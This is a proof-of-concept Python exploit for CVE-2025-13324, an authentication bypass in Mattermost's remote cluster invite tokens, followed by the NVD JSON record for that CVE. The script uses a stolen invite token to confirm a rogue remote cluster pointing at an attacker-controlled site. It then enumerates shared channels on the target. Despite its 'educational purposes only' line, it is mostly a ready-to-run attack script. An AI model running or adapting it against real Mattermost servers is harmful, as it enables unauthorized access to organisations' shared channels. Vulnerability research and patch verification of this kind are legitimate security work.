CVE-2025-13324

# CVE-2025-13324 PoC - Mattermost Remote Cluster Invite Token Authentication Bypass # Note: This PoC is for educational purposes only import requests import json import time TARGET_URL = "https://target-mattermost-server.com" ATTACKER_TOKEN = "<stolen_invite_token>" def check_vulnerability(): """Check if target Mattermost instance is vulnerable""" # Step 1: Attempt to establish remote cluster connection using old invite token session = requests.Session() headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json", "X-Version": "1" # Legacy protocol version } # Step 2: Try to confirm remote cluster connection with stale token confirm_payload = { "remote_cluster_name": "attacker_cluster", "site_url": "https://attacker-controlled-site.com", "shared_channels_enabled": True } response = session.post( f"{TARGET_URL}/api/v4/remote_clusters/confirm", headers=headers, json=confirm_payload, verify=False ) if response.status_code == 200: data = response.json() if "remote_cluster_id" in data: print("[+] VULNERABLE: Successfully bypassed token validation!") print(f"[+] Remote Cluster ID: {data['remote_cluster_id']}") return True print("[-] Target may not be vulnerable or token is invalid") return False def access_shared_channels(remote_cluster_id): """Access shared channels after successful bypass""" session = requests.Session() headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}" } # List shared channels channels_response = session.get( f"{TARGET_URL}/api/v4/channels?remote_cluster_id={remote_cluster_id}", headers=headers ) if channels_response.status_code == 200: channels = channels_response.json() print(f"[+] Found {len(channels)} shared channels") return channels return [] if __name__ == "__main__": print("CVE-2025-13324 Mattermost Authentication Bypass PoC") print("=" * 50) check_vulnerability()

{"cve": {"id": "CVE-2025-13324", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:01.093", "lastModified": "2025-12-29T18:46:13.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.5, 11.0.x <= 11.0.4, 10.12.x <= 10.12.2 fail to invalidate remote cluster invite tokens when using the legacy (version 1) protocol or when the confirming party does not provide a refreshed token, which allows an attacker who has obtained an invite token to authenticate as the remote cluster and perform limited actions on shared channels even after the invitation has been legitimately confirmed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.6", "matchCriteriaId": "01DCCC9D-79BE-4B4D-9ECC-1299F88541D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.3", "matchCriteriaId": "DD0ED714-56F9-4C84-B84D-3BF658940568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.5", "matchCriteriaId": "6130B691-5017-418D-A28A-84A83AA2496C"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}